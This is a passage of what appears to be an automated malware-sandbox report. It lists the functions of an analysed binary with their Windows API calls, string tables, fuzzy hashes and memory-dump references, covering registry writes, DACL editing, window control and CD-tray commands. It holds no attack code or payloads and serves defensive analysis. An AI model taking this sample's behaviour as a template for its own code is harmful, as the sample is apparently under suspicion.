                                                                                                                                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                    • Opcode ID: 920619f736819f12022b330d4a9061651ef0ded6016873fa8ad39b2f69655bfe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 06dedbb9796681f5224105f847d245ca5c547f02ebff93c7cd010a056102b62b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 920619f736819f12022b330d4a9061651ef0ded6016873fa8ad39b2f69655bfe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FB19B71608301AFD714DF64C894B9BFBE5EF84324F409A5CF599AB2A1D731E844CB92
                                                                                                                                                                                                                                                                                                    Function 00EB0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EB0D81
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0DBB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0E25
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0E8D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB0F11
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EB0F61
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EB0FA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E82BA5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E82BD7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87a59c89b301b356e2b1acc6bbe0cc05f360fce4f96d5d08ec297b0627ea6a1e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4d93e31cdce14a41418fa7245e40c2a36737d0c2174db5585fdbd9547602b96c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87a59c89b301b356e2b1acc6bbe0cc05f360fce4f96d5d08ec297b0627ea6a1e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E19E312083418FC714EF28C9519ABB7E6BF88318B54696DF49ABB3A1DB30ED45CB51
                                                                                                                                                                                                                                                                                                    Function 00E816D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E81741
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E81775
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E8178C
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E817C6
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E817E2
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E817F9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E81801
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E81808
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E81829
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00E81830
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8185F
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E81881
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E81893
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818BA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818C1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818CA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818D1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E818DA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818E1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E818ED
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E818F4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: GetProcessHeap.KERNEL32(00000008,00E814FD,?,00000000,?,00E814FD,?), ref: 00E81AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E814FD,?), ref: 00E81AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E814FD,?), ref: 00E81B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a453dd84283039c6e1a195e72e6602942f20fac2156fdbbcfabf87407c95d80c
                                                                                                                                                                                                                                                                                                    • Instruction ID: c00a3d2538fe7cd4555a1574c091935afd63fffd92269b91f911061b4bc40415
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a453dd84283039c6e1a195e72e6602942f20fac2156fdbbcfabf87407c95d80c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29717DB1D0420AAFDB10EFA5EC45FAFBBBDAF04314F144265E919B6190E7319906CB60
                                                                                                                                                                                                                                                                                                    Function 00EACE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EACF1D
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EBDCD0,00000000,?,00000000,?,?), ref: 00EACFA4
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00EAD004
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EAD054
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EAD0CF
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00EAD112
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00EAD221
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00EAD2AD
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAD2E1
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAD2EE
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00EAD3C0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                    • Opcode ID: 065dd39cf197915982a593f4211803799ebc93309822a95c8235f73d98c717ef
                                                                                                                                                                                                                                                                                                    • Instruction ID: e4a922c07ac65e8b2b9dcde524125603084e5421983aea8562fc575462ed6b01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 065dd39cf197915982a593f4211803799ebc93309822a95c8235f73d98c717ef
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA1268356042119FDB14DF14D981B2AB7E6EF89714F15989CF88AAB3A2CB31FD41CB81
                                                                                                                                                                                                                                                                                                    Function 00EB13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00EB1462
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB149D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB14F0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB1526
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB15A2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB161D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E83535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E83547
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8acf476b07446f6ad5c432fef7e60cdcf70f236ffea9858f656c8e6f219985fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: ddfc59d557dd049493a94506d55f9bb8ad90de23e77b222d224418e35ae1886a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8acf476b07446f6ad5c432fef7e60cdcf70f236ffea9858f656c8e6f219985fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92E1B0316083518FC714DF24C5609ABB7E2BF94324B54699DF89ABB361DB30ED45CB81
                                                                                                                                                                                                                                                                                                    Function 00EAD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                    • Opcode ID: e1567c3b11899f68ac6ef6d1c4cbaaf89a9363444ad656609b72f2317048c4e8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 42c42890290e184c42f40e1684c1513fd05119271f38253ba07c3c31ce71dad7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1567c3b11899f68ac6ef6d1c4cbaaf89a9363444ad656609b72f2317048c4e8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18710B72A0811A8BCB109E78CD415FE3391AFAA75CB152125F867BF694EB35ED44C390
                                                                                                                                                                                                                                                                                                    Function 00EB8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DB5
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DC9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8DEC
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EB8E0F
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EB8E4D
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EB6691), ref: 00EB8EA9
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EB8EE2
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EB8F25
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EB8F5C
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00EB8F68
                                                                                                                                                                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EB8F78
                                                                                                                                                                                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00EB6691), ref: 00EB8F87
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EB8FA4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EB8FB0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                    • Opcode ID: b45b6d8475cead7373f454d5c891181897899d9c38fef5c559a991516fdb8650
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d16f6cca8f55bf1175b16a1fc26f885cd9d1be5d37c0ad3c0b40eb4522fbd08
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b45b6d8475cead7373f454d5c891181897899d9c38fef5c559a991516fdb8650
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1561CEB1A00219BEEB149F64DD41BFF77ACAF08B14F105206F915F62D1EB74A990CBA0
                                                                                                                                                                                                                                                                                                    Function 00E948BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00E9493D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94948
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E9499F
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E949DD
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00E94A1B
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94A63
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94A9E
                                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E94ACC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ecf58c1c3e58d1e2bce23cc3ddd69f3277009a08f4917b80f3a6fb8fde6b922
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4e1c30bfa281fdce85084793fe90561a59159f31a7ed39cf8d984cf63baff26e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecf58c1c3e58d1e2bce23cc3ddd69f3277009a08f4917b80f3a6fb8fde6b922
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C071E3B25083168FC710EF24D84196BB7E4EF98758F10692DF895B7291EB30DD46CB91
                                                                                                                                                                                                                                                                                                    Function 00E86382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00E86395
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E863A7
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E863BE
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00E863D3
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E863D9
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E863E9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E863EF
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E86410
                                                                                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E8642A
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E86433
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8649A
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E864D6
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00E864DC
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00E864E3
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E8653A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E86547
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E8656C
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E86596
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 895679908-0
